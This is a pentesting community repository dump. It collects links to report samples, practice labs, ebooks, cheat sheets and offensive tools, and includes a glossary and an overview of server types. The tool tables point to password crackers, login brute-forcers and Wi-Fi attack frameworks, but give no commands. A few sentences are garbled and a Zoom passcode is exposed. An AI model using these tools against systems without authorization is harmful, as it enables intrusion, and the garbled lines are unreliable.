Samples:\n\nIndex | Pentesting Report Sample\n---|---\n**1** | [By Resethacker (Vikram) ](/.pdfs/FinalV1.pdf)\n**2** | [Public Pentesting Reports by juliocesarfort](https://github.com/juliocesarfort/public-pentesting-reports)\n**3** | [Web Application Pentesting report sample by SecurityBoat(Ninad Mathpati)](https://ninadmathpati.com/Web%20Application%20Pen%20Test%20Report.pdf)\n**4** | [Public Pentesting Reports by pentestreports.com](https://pentestreports.com/reports/)\n\n## Pentesting Videoes - How to write pentest report ?\n\nIndex | Pentesting Vdeoes\n---|---\n**1** | [Penetration testing - How to write pentest Report](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/pentestingvideos.md)\n\n## Pentesting Timelines\n \n Most pentesting people ask this question \"What time investment do you estimate for a penetration test?\n\n The time investment for a penetration test varies from case to case depending on the systems to be tested and the individual test requirements. \n Usually, the time needed ranges from a few days to several weeks. One goal of the preliminary meeting is to get enough information about \n the systems to be tested to estimate the optimal length/time for the penetration test. \n\nAuthor | Pentesting Timelines\n-- | --\n**1** securitymetrics | [Penetration Testing Timeline](https://www.securitymetrics.com/content/dam/securitymetrics/PDF-files/Penetration_Testing_Timeline_Checklist.pdf)\n\n #### Penetration Testing Timeline for enterprices\n ✅1. SCHEDULING\n 2-4 Months Before Penetration Test\n \n ✅2. TESTING PREPARATION\n 5 Weeks Before Penetration Test\n \n ✅3. AUTOMATED/MANUAL TESTING\n During Penetration Test\n \n ✅4. REPORTING\n 0-6 Weeks After Penetration Test\n\n ✅5. REMEDIATION\n 0-3 Months After Penetration Test\n \n ✅6. RETESTING\n 0-3 Months After Penetration Test\n \n ✅7. AFTER RETESTING\n Ongoing\n\n\n\n## Pentesting Quotation\nAuthor | Pen testing Quotation\n-- | --\n**1** Updating Soon | [Penetration Quotation - Updating Soon]()\n\n" }, { "path": "PentestingReports/pentestingvideos.md", "content": "Index | Pentest Videos\n-- | --\n \n**1** | [Pentest Reporting and Best Practices -HackerOne](https://www.youtube.com/watch?v=6QIrXgPGJhM)\n\n**2** | [Penetration Testing Reporting -Lord Saibat](https://www.youtube.com/watch?v=6SqAXl24QaM)\n\n**3** | [Writing a Pentest Report -The Cyber Mentor](https://youtu.be/EOoBAq6z4Zk)\n\n**4** | [Tips for How to Create a Pen (Penetration)(Testing Report - Download Report Sample](https://pentestreports.com/video/nez4sfjjwvu)\n\n**5** | [OSCP Report Made Easy -Michael LaSalvia](https://www.youtube.com/watch?v=O9JWmF3Bgis)\n\n**6** | [OSCP - How to Write the Report -Conda](https://www.youtube.com/watch?v=Ohm0LhFFwVA)\n\n**7** | [Pen Test Process: The Report -Red Siege](https://www.youtube.com/watch?v=oyJ0atDagco)\n\n**8** | [Public Penetration Test Reports - Learning Resource \tLiveOverflow](https://www.youtube.com/watch?v=qNLMuls2BBA)\n\n**9** | [Writing Reports: The Overlooked Pen Testing Skill | Pen Test HackFest Summit 2021 -SANS Offensive Operations](https://www.youtube.com/watch?v=r-6LBjlM14Y)\n\n**10** | [Why a Pentesting Report is extremely important? -EC Council](https://www.youtube.com/watch?v=tbuU0uzU-oI)\n\n**11** | [Pentest Report Writing Made Simple (No MS Office) -Zanidd](https://www.youtube.com/watch?v=u_-b_JIqPbs)\n\n" }, { "path": "Pentesting_for_Researchers/PTplatform.md", "content": "## FREE LABS TO TEST YOUR PENTEST/CTF SKILLS 👩‍💻👀\n\nIndex | Websites\n-- | --\n- | [SANS Challenger](http://www.smashthestack.org/wargames.html)\n- | [SmashTheStack](https://www.holidayhackchallenge.com/2021/)\n- | [The Cryptopals Crypto Challenges](https://cryptopals.com)\n- | [Try Hack Me](https://tryhackme.com)\n- | [Vulnhub](https://vulnhub.com)\n- | [W3Challs](https://w3challs.com)\n- | [Academy Hackaflag BR](https://hackaflag.com.br)\n- | [Attack-Defense](https://attackdefense.com)\n- | [Alert to win](https://alf.nu/alert1)\n- | [CTF Komodo Security](https://ctf.komodosec.com)\n- | [CMD Challenge](https://cmdchallenge.com)\n- | [Explotation Education](https://exploit.education)\n- | [Google CTF](https://lnkd.in/e46drbz8)\n- | [HackTheBox](https://hackthebox.com)\n- | [Hackthis](https://hackthis.co.uk)\n- | [Hacksplaining](https://lnkd.in/eAB5CSTA)\n- | [Hacker101](https://ctf.hacker101.com)\n- | [Hacker Security](https://lnkd.in/ex7R-C-e)\n- | [Hacking-Lab](https://hacking-lab.com)\n- | [HSTRIKE](https://hstrike.com)\n- | [ImmersiveLabs](https://immersivelabs.com)\n- | [NewbieContest](https://lnkd.in/ewBk6fU5)\n- | [OverTheWire](http://overthewire.org)\n- | [Practical Pentest Labs](https://lnkd.in/esq9Yuv5)\n- | [Pentestlab](https://pentesterlab.com)\n- | [Penetration Testing Practice Labs](https://lnkd.in/e6wVANYd)\n- | [PentestIT LAB](https://lab.pentestit.ru)\n- | [PicoCTF ](https://picoctf.com)\n- | [PWNABLE](https://lnkd.in/eMEwBJzn)\n- | [Root-Me](https://root-me.org)\n- | [Root in Jail](http://rootinjail.com)\n- | [WeChall](http://wechall.net)\n- | [Zenk-Security](https://lnkd.in/ewJ5rNx2)\n" }, { "path": "Pentesting_for_Researchers/Pentest-Reports.md", "content": "[𝗙𝗥𝗘𝗘 𝗥𝗘𝗦𝗢𝗨𝗥𝗖𝗘𝗦 / 𝗣𝗘𝗡𝗧𝗘𝗦𝗧 𝗥𝗘𝗣𝗢𝗥𝗧] - By @Gabrielle_BGB\n\nWant to upgrade your reporting skills?\nCheck out these resources\n\n👉 𝗦𝘁𝗿𝘂𝗰𝘁𝘂𝗿𝗲 𝗼𝗳 𝗮 𝗽𝗲𝗻𝘁𝗲𝘀𝘁 𝗿𝗲𝗽𝗼𝗿𝘁\n🌟My article on how to write a pentest report:\nhttps://lnkd.in/eH92fT8Q\n\n👉 𝗛𝗼𝘄 𝘁𝗼 𝘁𝗮𝗸𝗲 𝗻𝗼𝘁𝗲𝘀\n🌟 Cherry Tree\nhttps://lnkd.in/eqTjHYKi\n🌟 Joplin\nhttps://joplinapp.org/\n🌟 Keepnote\nhttp://keepnote.org/\n\n👉 𝗧𝗶𝗽𝘀 𝗳𝗿𝗼𝗺 𝗘𝘅𝗽𝗲𝗿𝘁𝘀\n🌟 Writing Tips for IT Professionals by Lenny Zeltser\nhttps://lnkd.in/eMSiEpeZ\n🌟 How to write a Penetration Testing Report by HackerSploit\nhttps://lnkd.in/ekSu5vAp\n\n👉 𝗔𝘂𝘁𝗼𝗺𝗮𝘁𝗶𝗼𝗻\n🌟 Blackstone project by micro-joan\nhttps://lnkd.in/eBSy58Ur\n🌟 Pentext by Radically Open Security\nhttps://lnkd.in/eNPhHHdx\n\n👉 𝗘𝘅𝗮𝗺𝗽𝗹𝗲𝘀 𝗼𝗳 𝗿𝗲𝗽𝗼𝗿𝘁𝘀\n🌟 A list of public pentest reports by juliocesarfort\nhttps://lnkd.in/ebeJwVXQ\n🌟 A list of bug bounty writeup on Pentester Land\nhttps://lnkd.in/e4G9xB9A \n" }, { "path": "Pentesting_for_Researchers/Readme.md", "content": "# PEN TESTERS (Under Development)\n1. Company have PEN TESTERS team to conduct pentesting.\n2. Company HIRING PEN TEST SERVICES - on hourly basis or project basis.\n\n- A list of [Privacy & Security Resources](https://docs.hackliberty.org/books/privacy-security/page/privacy-security-resources)\n\n# PentestingEbook overview:\n\nAuthor Pentesting | Title\n-- | --\n1. [Practicle Hardware pentesting](https://t.me/freedomf0x/16886)\n2. [Pentesting Industrial Control Stytem.](https://t.me/freedomf0x/16889)\n3. [Network Pentesting](https://t.me/freedomf0x/12884)\n4. [Web pentesting 1](https://t.me/freedomf0x/16879)& [Web pentesting 2](https://t.me/freedomf0x/14577)\n5. [Pentesting Azure](https://t.me/freedomf0x/16891) , [window server](https://t.me/freedomf0x/15382), [powershell, and active directory](https://t.me/freedomf0x/12882)\n\n- Mobile Application Pentesting:\n - [OWASP Mobile Application Security](https://mas.owasp.org/)\n - [eLearnSecurity Mobile Application Penetration Testing (eMAPT) Notes ANDROID by Joas](https://drive.google.com/file/d/1vDPzDhGZiRXWPGZ4Yk2grBzA0ouE2KMw/view)\n - [Mobile Pentesting Roadmap](https://medium.com/@rezaduty/mobile-penetration-tester-roadmap-f2ec9bd68dcf)\n - [Mobile Application Penetration Testing Cheat Sheet](https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet)\n - [TDI 2022 - Android Application Hacking Talk](https://csbygb.gitbook.io/pentips/talks/android-app)\n\n# Pentesting for Researchers \n\nAuthor Pentesting | Title\n-- | --\n**1** Vulnerabilityassessment | [Penetration Testing Framework 0.59](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html)\n**2** Elijah | [Pentesting Notes](https://github.com/dostoevskylabs/dostoevsky-pentest-notes)\n**3** Chryzsh | [Beginner Friendly's Pentesting](https://chryzsh.gitbooks.io/pentestbook/content/)\n**4** Pentesting Standard | [High Level Pentesting Standard](http://www.pentest-standard.org/index.php/Main_Page))\n**5** Phases of Infrastructure Pentest | [All the phases of Infrastructure Pentest](https://bitvijays.github.io/index.html)\n**6** Sdcampbell | [Internal Network Penetration Test Playbook ](https://github.com/sdcampbell/Internal-Pentest-Playbook)\n**7** Red team/Bug Bounty Security Referances | [by s0cm0nkey](https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/web-app-hacking)\n**8** enaqx | [Awsome Pentest](https://github.com/enaqx/awesome-pentest)\n**9** Gabrielle_BGB | [Pentest Tips](https://github.com/CSbyGB/pentips)\n**10** Wordlists | [All Wordlists](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists.md)\n\nAuthor | Pentesting Checklist\n-- | --\n**1** | [Pentesting Checklist](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/PentestingChecklist)\n**1** | [API Security Checklist](https://github.com/shieldfy/API-Security-Checklist)\n\nAuthor | Pentesting Mindmap\n-- | --\n**1** | [Internal-Network-Pentest-MindMap](https://github.com/sdcampbell/Internal-Network-Pentest-MindMap)\n\nAuthor | Pentesting Cheetsheet\n-- | --\n**1** | [Pentesting Cheetsheet](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/cheetsheets)\n**2** | [hausec - pentesting cheetsheet](https://hausec.com/pentesting-cheatsheet/)\n**3** | [ired - offensive-security-cheetsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets)\n**4** | [anhtai - beginner friendly penetsting cheetsheet](https://anhtai.me/pentesting-cheatsheet/)\n**5** | [coreb1t Collection of the cheat sheets useful for pentesting:](https://github.com/coreb1t/awesome-pentest-cheat-sheets)\n**6** | [Randomkeystrokes - Wifi Pentesting Command Cheatsheet](https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/)\n**7** | [NEED TO UPDATE - pentesting-with-powershell-in-six-steps](https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/)\n\n\nAuthor | Pentesting Tools\n-- | --\n**1** S3cur3Th1sSh1t | [Pen Testing Tools ](https://github.com/S3cur3Th1sSh1t/Pentest-Tools)\n\nAuthor | Pentesting Labs\n-- | --\n**1** | [Practice Labs for Pentesting ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Pentesting_for_Researchers/PTplatform.md)\n\n## Tools\n- [Oh-My-Zsh-theme-for-pentesters which includes the date, time, and IP address for pentest logging.](https://github.com/sdcampbell/lpha3cho-Oh-My-Zsh-theme-for-pentesters)\n\n## ASK Questions related to Pentesting \n\n-- | --\n**1** | [Wednesday Offensive - REDSIEGE]\n\n30 Minutes of conversations with people around the industry with Tim Medin and the Red Siege Team. Open to everyone, questions welcome!\nJoin us Wednesdays in an open conversation live video chat format. No Slides, Just talk! Topics will vary depending on guests, but conversations are open to everyone. You only need to register the first time and you're set for all future Wednesday Offensive conversations. \n\n[Zoom Meeting ID,passcode & link:842 7796 4949, 957717](https://us02web.zoom.us/w/84277964949?tk=c9Sq_ZUmgkIXWjmc9IFvz5JElMlmba3ll1gnawypC-8.DQMAAAATn1uwlRZTVWhXZy1HZVFwQ1k2VHRPMVNMU1FRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&pwd=LTWU2D9UAWMiSBE2gNF8yk8k8S95SJ9bAT)\n\n Aug 10, 2022 12:30 PM\n\n![web pentesting upderstand](https://user-images.githubusercontent.com/25515871/179118116-d376b928-f564-435b-a8c5-f38115aeb9da.png)\n" }, { "path": "README.md", "content": "## Let's crowdsource our infosec learning with [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER)\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n

\"Resources\"

\n\n\nHey folks! ResetHacker community is open for contributers and Everyone is welcome to contribute here. \n\n\n## Contributing - [Must Read me :)](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CONTRIBUTING.md)\n\nAs of writing, there are no code contributors to the main project. \nHowever, You can contribute to learning purpose resources that includes Conference, jobs, Writeups, Tutorials, Bugbounty helpdesk, pentesting helpdesk, How to get started, Review on courses etc. or modifing the README.md or any other repository.\n\n**We're inviting community contributers for early stage cybersecurity HELPDESK. This project is not limited to bugbounty or pentesting. Anyone is welcome to contribute.**\n\n## Rules are simple to crowdsource our learning.\n\n- Pick a topic from your domain or ADD domain or choose new topics that you find helpful for community.\n\n- If you still have question feel free to create an issue on github or want to contribute to this project as a member of Team. DM me on telegram @Attr1b or mail me to resethackerofficial@gmail.com\n\n---\n\nIndex | Topics\n---|---\n**0** | [Weekly InfoSec update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty)\n**1** | [CVE Poc and Exploit That matter](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)\n**1** | [BugBounty-Helpdesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)\n**2** | [Cybersecurity Jobs-Helpdesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting/blob/main/CyberSecurityJobs/Readme.md)\n**3** | [CyberSecurity Conferences](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)\n**4** | [Pentesting pre-engagement, NDA form, Report samples, timeline etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting/tree/main/PentestingReports)\n**5** | [Pentesting for Researchers](https://github.com/RESETHACKER-COMMUNITY/Pentesting/tree/main/Pentesting_for_Researchers)\n\n\n- **Contributors** 💪😎\n\t>Thanks a lot for spending your time helping! Keep rocking 🍻\n\t\n\t\n\t\n \t\n\t\n\n\t
\n

\nNote: Contents inside the **RESETHACKER** is to help the community and all\nthe content belongs to respective Authors and RESETHACKER.\n\t

\n\n# Catalog for Enterprises\n\t\t\nIndex | Topics (Updating Soon)\n---|---\n**1.** | [Who conducts VAPT?]\n**2.** | [Benefit of VAPT?] \n**3.** | [Purpose of VAPT?]\n**4.** | [Vulnerability serverity & impact analysis.]\n**5.** | [Difference between VA & PT?]\n\n# OWASP top 10 (2017 - 2021)\n\n\"OWASP\n\n\n# Table of Contents for Community 📚 \n\n- [Introduction](#introduction)\n - [What is penetration testing?](#what-is-penetration-testing)\n - [Want to become a penetration tester?](#want-to-become-a-penetration-tester)\n- [Some vocabulary](#some-vocabulary)\n- [Difference between hacking and ethical hacking](#difference-between-hacking-and-ethical-hacking)\n- [Languages](#languages)\n- [Content Management Systems](#content-management-systems)\n- [Basic steps of pen testing](#basic-steps-of-pen-testing)\n- [Tools by category](#tools-by-category)\n - [:male_detective: Information Gathering](#male_detective-information-gathering)\n - [:lock: Password Attacks](#lock-password-attacks)\n - [:memo: Wordlists](#memo-wordlists)\n - [:globe_with_meridians: Wireless Testing](#globe_with_meridians-wireless-testing)\n - [:wrench: Exploitation Tools](#wrench-exploitation-tools)\n - [:busts_in_silhouette: Sniffing & Spoofing](#busts_in_silhouette-sniffing--spoofing)\n - [:rocket: Web Hacking](#rocket-web-hacking)\n - [:tada: Post Exploitation](#tada-post-exploitation)\n - [:package: Frameworks](#package-frameworks)\n - [Books / Manuals](#books--manuals)\n - [Discussions](#discussions)\n - [Security Advisories](#security-advisories)\n- [Must Check out by Awesome resources]\n- [Additional resources](#additional-resources)\n- [License](#license)\n\n(TOC made with [nGitHubTOC](https://imthenachoman.github.io/nGitHubTOC/))\n\n# Introduction\n\n## What is penetration testing?\n\nPenetration testing is a type of security testing that is used to test the security of an application. It is conducted to find a security risk which might be present in a system.\n\nIf a system is not secure, then an attacker may be able to disrupt or take unauthorized control of that system. A security risk is normally an accidental error that occurs while developing and implementing software. For example, configuration errors, design errors, and software bugs, etc. [Learn more](https://www.tutorialspoint.com/penetration_testing/penetration_testing_quick_guide.htm)\n\n## Want to become a penetration tester?\n\nKnowing about risks on the internet and how they can be prevented is very useful, especially as a developer. Web hacking and penetration testing is the v2.0 of self-defense! But is knowing about tools and how to use them really all you need to become a pen tester? Surely not. A real penetration tester must be able to proceed rigorously and detect the weaknesses of an application. They must be able to identify the technology behind and test every single door that might be open to hackers.\n\nThis repository aims first to establish a reflection method on penetration testing and explain how to proceed to secure an application. And secondly, to regroup all kind of tools or resources pen testers need. **Be sure to know basics of programming languages and internet security before learning pen testing.**\n\nAlso, this is important to inform yourself about the law and what you are allowed to do or not. According to your country, the computer laws are not the same. First, check laws about privacy and surveillance: [Nine eyes countries](https://en.wikipedia.org/wiki/Five_Eyes#Other_international_cooperatives), [Five eyes](https://en.wikipedia.org/wiki/Five_Eyes) and Fourteen Eyes. Always check if what you're doing is legal. Even when it's not offensive, information gathering can also be illegal!\n\n([Table of Contents](#table-of-contents))\n\n# Some popular domains in cybersecurity\n\n**Infosec**: Information security, which is the practice of preventing unauthorized access, use, disclosure, disruption, modification, inspection, recording or destruction of information. The information or data may take any form, e.g. electronic or physical. Infosec can also be a person who practices ethical security. [Wikipedia](https://en.wikipedia.org/wiki/Information_security)\n\n**Opsec**: Operations security, which is a process that identifies critical information to determine if friendly actions can be observed by enemy intelligence, determines if information obtained by adversaries could be interpreted to be useful to them, and then executes selected measures that eliminate or reduce adversary exploitation of friendly critical information. [Wikipedia](https://en.wikipedia.org/wiki/Operations_security)\n\n**Black/grey/white hat hacker**: Someone who uses bugs or exploits to break into systems or applications. The goal and the method differs depending if they're a black, grey or white hat hacker. A black hat is just someone malicious that does not wait permission to break into a system or application. A white hat is *usually* a security researcher who practice ethical hacking. A grey hat is just in the middle of these two kind of hackers, they might want to be malicious if it can be benefit (data breach, money, whistleblowing ...).\n\n**Red team**: According to Wikipedia, a red team or the red team is an independent group that challenges an organization to improve its effectiveness by assuming an adversarial role or point of view. It is particularly effective in organizations with strong cultures and fixed ways of approaching problems. The United States intelligence community (military and civilian) has red teams that explore alternative futures and write articles as if they were foreign world leaders. Little formal doctrine or publications about Red Teaming in the military exist. In infosec exercises, Red teamers are playing the role of attackers. [Wikipedia](https://en.wikipedia.org/wiki/Red_team)\n\n**Blue team**: A blue team is a group of individuals who perform an analysis of information systems to ensure security, identify security flaws, verify the effectiveness of each security measure, and to make certain all security measures will continue to be effective after implementation. As a result, blue teams were developed to design defensive measures against red team activities. In infosec exercises, Blue teamers are playing the role of defenders. [Wikipedia](https://en.wikipedia.org/wiki/Blue_team_(computer_security))\n\n**Penetration tester**: An ethical hacker who practices security, tests applications and systems to prevent intrusions or find vulnerabilities.\n\n**Security researcher**: Someone who practices pen testing and browses the web to find phishing/fake websites, infected servers, bugs or vulnerabilities. They can work for a company as a security consultant and are most likely a Blue teamer.\n\n**Reverse engineering**: Reverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, or to extract knowledge from the object. Similar to scientific research, the only difference being that scientific research is about a natural phenomenon. [Wikipedia](https://en.wikipedia.org/wiki/Reverse_engineering)\n\n**Social engineering**: In the context of information security, it refers to psychological manipulation of people into performing actions or divulging confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional \"con\" in that it is often one of many steps in a more complex fraud scheme. The term \"social engineering\" as an act of psychological manipulation of a human, is also associated with the social sciences, but its usage has caught on among computer and information security professionals. [Wikipedia](https://en.wikipedia.org/wiki/Social_engineering_(security))\n\n**Threat analyst**: A threat hunter, also called a cybersecurity threat analyst, is a security professional or managed service provider (MSP) that proactively uses manual or machine-assisted techniques to detect security incidents that may elude the grasp of automated systems. Threat hunters aim to uncover incidents that an enterprise would otherwise not find out about, providing chief information security officers (CISOs) and chief information officers (CIOs) with an additional line of defense against advanced persistent threats (APTs). [SearchCIO](https://searchcio.techtarget.com/definition/threat-hunter-cybersecurity-threat-analyst)\n\n**site reliability engineer (SRE)**:\n\n**Pipeline**:\n\n**CI/CD pipeline**:\n\n**DevOps**:\n\n**DevSecOps**:\n\n\n\n([Table of Contents](#table-of-contents))\n\n## Difference between practising penetration testing and ethical hacking\n\nA black hat is practicing penetration testing, but unlike a white hat, this is not ethical hacking. Ethical hacking is about finding vulnerabilities and improve and security of a system. An ethical hacker is the ultimate security professional. Ethical hackers know how to find and exploit vulnerabilities and weaknesses in various systems, jusTheycious hacker (a black hat hacker). In fact, they both use the same skills; however, an ethical hacker uses those skills in a legitimate, lawful manner to try to find vulnerabilities and fix them before the bad guys can get try to break in. An ethical hacker is basically a white hat hacker.\n\n\n## Difference between SRE and Devops\n\n## **Differnece B/w DAST, SAST And IAST**\n\n([Table of Contents](#table-of-contents))\n\n# Languages\n\nLearning programming is the very first way to start learning about security. There's a lot of languages, most people start with Python, it's the easiest and the most popular one. PHP and Go are the less popular to write security-related stuff, but any of these can still be used in such context. Bash and Powershell are mostly about scripting and writing simple CLI applications.\n\nSince not all languages work the same way, you need to look at how they work and what you want to learn. For example, C++ and Java compile, PHP and Pyththey are interpreted languages. This definitely changes what you ld use them for. Each language also has its own design patterns.\n\n### Scripting\n\n- Bash\n- Powershell\n\n### Software & mobile apps\n\n- JavaScript\n- Java\n- Swift\n- C / C++ / C#\n\n### General purpose\n\n- Go\n- [Python](https://github.com/dloss/python-pentest-tools)\n- Ruby\n- Perl\n- PHP\n\n([Table of Contents](#tableWordPressnts))\n\n# Content Management Systems\n![image](https://user-images.githubusercontent.com/25515871/179156778-46da58f4-8531-46ee-93ef-068a9501f789.png)\n\nThese are the most used Content Management Systems (CMS). See a complete list [here](https://en.wikipedia.org/wiki/List_of_content_management_systems).\n\n# SERVER : A server is a central repository or the part of web hosting infrastructure that hosts websites.\n\t\t\n## **1. Web Server:**\n Web server will receive all the requests from sent by visitors visiting your website and also forward only the business requests to application server. \n\n\t The static assets (like CSS, JS components , Web components eg Common images, resources files and html components) will be served from your web server itself. \n\t Web server runs on Microsoft IIS:ASP(.NET), Apache: Php/CGI, Apache Tomcat: Servlet, Nginx, HTTPD ,Jetty: Servlet\n\t or even Python's Simple HTTPServer etc.\n\t Web servers primarily respond to HTTP / HTTPS requests however isn't restricted to simply communications protocol. \n\t It may be provided alternative protocol support like RMI/RPC.\n\n**Front End (Web UI) <-> BackEnd (API) <-> Web server (web page and graphics files) <-> Load Balancer <-> Application Server(Templete pages code & data) <-> DataBase (Couch DB + MySql + Elasstic DB + MongoDB + Firebase )**\n\n\n## **2. Application server:**\n\n Application server is the server that works between Web server and database server and basically Generate (dynamic content/assets by executing server \n side code eg JSP, servlet or EJB), manages(Transaction Support, Messaging support etc), processes the data(connection Pooling, object pooling etc) \n and host application etc and application server will be responsible for only business requests (like Login, Fetching details and etc,. )\n\t\t\n\t\t○ MTS: COM+\n\t\t○ Email server\n\t\t○ WAS: EJB\n\t\t○ JBoss: EJB\n\t\t○ WebLogic Application Server: EJB\n\t\t○ Google maps servers\n\t\t○ Google search servers\n\t\t○ Google docs servers\n\t\t○ Microsoft 365 servers\n\t\t○ Microsoft computer vision servers for AI.\n\t\t\n • Application servers \n Application Server can do whatever Web Server is capable and respond to any number of protocols depending on the application business logic.\n\n## **3. Database Server:**\n\n Database server handles database queries and It can only accessed by application server. It runs on MySQL, PostgreSQL, MariaDB, etc Database servers use protocols ODBC, JDBC, etc.\n\n**Please note:**\n\n\t• Web Server is designed to serve HTTP static Content like HTML, images etc. and for the dynamic content have plugins to support \n\tscripting languages like Perl, PHP, ASP, JSP etc\n\t\n\t• Web container is a part of Web Server and the Web Server is a part of Application Server.\n\t\n\t• A Web Server in java is also known as a web container or a servlet container which has a limited set of Java EE features like Servlets, JSP etc. \n\tEx: Apache Tomcat.\n\t\n\t• An Application Server has a web container in it as well as full java EE features like Java Mail Service, JPA, JSF etc.\n\tEx:Glassfish, Apache TomEE, JBoss or Wildfly(new name ), IBM websphere etc.\n\t\n\t• If you have a Java application with just JSP and Servlet to generate dynamic content then you need web containers like Apache Tomcat or Jetty. \n\tWhile, if you have Java EE application using EJB, distributed transaction, messaging and other fancy features than \n\tyou need a full fledged application server like JBoss, WebSphere or Oracle's WebLogic.\n\t\n\t• The use of Load Balancer is to distribute the load between multiple application servers. \n\t\n\t• Application server can only accessed via web server, database server can only accessed by application server. \n\t\n\t• If you want to solve web server and application server purposes in one server, I would like to prefer you a \n\tVPS hosting servers and dedicated hosting servers.It is because they host volumes of web projects and applications with a higher uptime.\n\nFrom \n https://developer.mozilla.org/en-US/docs/Learn/Common_questions/Pages_sites_servers_and_search_engines\n\n\n([Table of Contents](#table-of-contents))\n\n# cloud servers\n\n![cloud-provider](https://user-images.githubusercontent.com/25515871/182293888-62d7d7be-0f8a-4220-88f9-36db7be3ac28.png)\n\n\n# Basic steps of pen testing\n\n

\n \n

\n\n*Source: [tutorialspoint](https://www.tutorialspoint.com/penetration_testing/index.htm)*\n\n[Read more about pen testing methodology](https://www.tutorialspoint.com/penetration_testing/penetration_testing_method.htm)\n\n([Table of Contents](#table-of-contents))\n\n# Tools by category\n\nA more complete list of tools can be found on [Kali Linux official website](https://tools.kali.org/tools-listing).\n\n#### :male_detective: Information Gathering\n\nInformation Gathering tools allows you to collecinformationata about services and users. Check informations about a domain, IP address, phone number or an email address.\n\n| Tool | Language | Support | Description |\n| ----------- |-------------------------|----------|----------------|\n| [theHarvester](https://github.com/laramies/theHarvester) | **Python** | `Linux/Windows/macOS` | E-mails, subdomains and names Harvester. |\n| [CTFR](https://github.com/UnaPibaGeek/ctfr) | **Python** | `Linux/Windows/macOS` | Abusing Certificate Transparency logs for getting HTTPS websites subdomains. |\n| [Sn1per](https://github.com/1N3/Sn1per) | **bash** | `Linux/macOS` | Automated Pentest Recon Scanner. |\n| [RED Hawk](https://github.com/Tuhinshubhra/RED_HAWK) | **PHP** | `Linux/Windows/macOS` | All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all penetration testers. |\n| [Infoga](https://github.com/m4ll0k/Infoga) | **Python** | `Linux/Windows/macOS` | Email Information Gathering. |\n| [KnockMail](https://github.com/4w4k3/KnockMail) | **Python** | `Linux/Windows/macOS` | Check if email address exists. |\n| [a2sv](https://github.com/hahwul/a2sv) | **Python** | `Linux/Windows/macOS` | Auto Scanning to SSL Vulnerability. |\n| [Wfuzz](https://github.com/xmendez/wfuzz) | **Python** | `Linux/Windows/macOS` | Web application fuzzer. |\n| [Nmap](https://github.com/nmap/nmap) | **C/C++** | `Linux/Windows/macOS` | A very common tool. Network host, vuln and port detector. |\n| [PhoneInfoga](https://github.com/sundowndev/PhoneInfoga) | **Go** | `Linux/macOS` | An OSINT framework for phone numbers. |\n\n#### :lock: Password Attacks\n\nCrack passwords and create wordlists.\n\n| Tool | Language | Support | Description |\n| ----------- |-------------------------|----------|----------------|\n| [John the Ripper](https://github.com/magnumripper/JohnTheRipper) | **C** | `Linux/Windows/macOS` | John the Ripper is a fast password cracker. |\n| [hashcat](https://github.com/hashcat/hashcat) | **C** | `Linux/Windows/macOS` | World's fastest and most advanced password recovery utility. |\n| [Hydra](https://github.com/vanhauser-thc/thc-hydra) | **C** | `Linux/Windows/macOS` | Parallelized login cracker which supports numerous protocols to attack. |\n| [ophcrack](https://gitlab.com/objectifsecurite/ophcrack) | **C++** | `Linux/Windows/macOS` | Windows password cracker based on rainbow tables. |\n| [Ncrack](https://github.com/nmap/ncrack) | **C** | `Linux/Windows/macOS` | High-speed network authentication cracking tool. |\n| [WGen](https://github.com/agusmakmun/Python-Wordlist-Generator) | **Python** | `Linux/Windows/macOS` | Create awesome wordlists with Python. |\n| [SSH Auditor](https://github.com/ncsa/ssh-auditor) | **Go** | `Linux/macOS` | The best way to scan for weak ssh passwords on your network. |\n\n###### :memo: Wordlists\n\n| Tool | Description |\n| ----------- |----------------|\n| [All Wordlist at one place](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists/AllWordlists.md) | Wordlists sorted by probability originally created for password generation and testing. |\n\n#### :globe_with_meridians: Wireless Testing\n\nUsed for intrusion detection and wifi attacks.\n\n| Tool | Language | Support | Description |\n| ----------- |-------------------------|----------|----------------|\n| [Aircrack](https://github.com/aircrack-ng/aircrack-ng) | **C** | `Linux/Windows/macOS` | WiFi security auditing tools suite. |\n| [bettercap](https://github.com/bettercap/bettercap) | **Go** | `Linux/Windows/macOS/Android` | bettercap is the Swiss army knife for network attacks and monitoring. |\n| [WiFi Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) | **Python** | `Linux/Windows/macOS/Android` | Framework for Rogue Wi-Fi Access Point Attack. |\n| 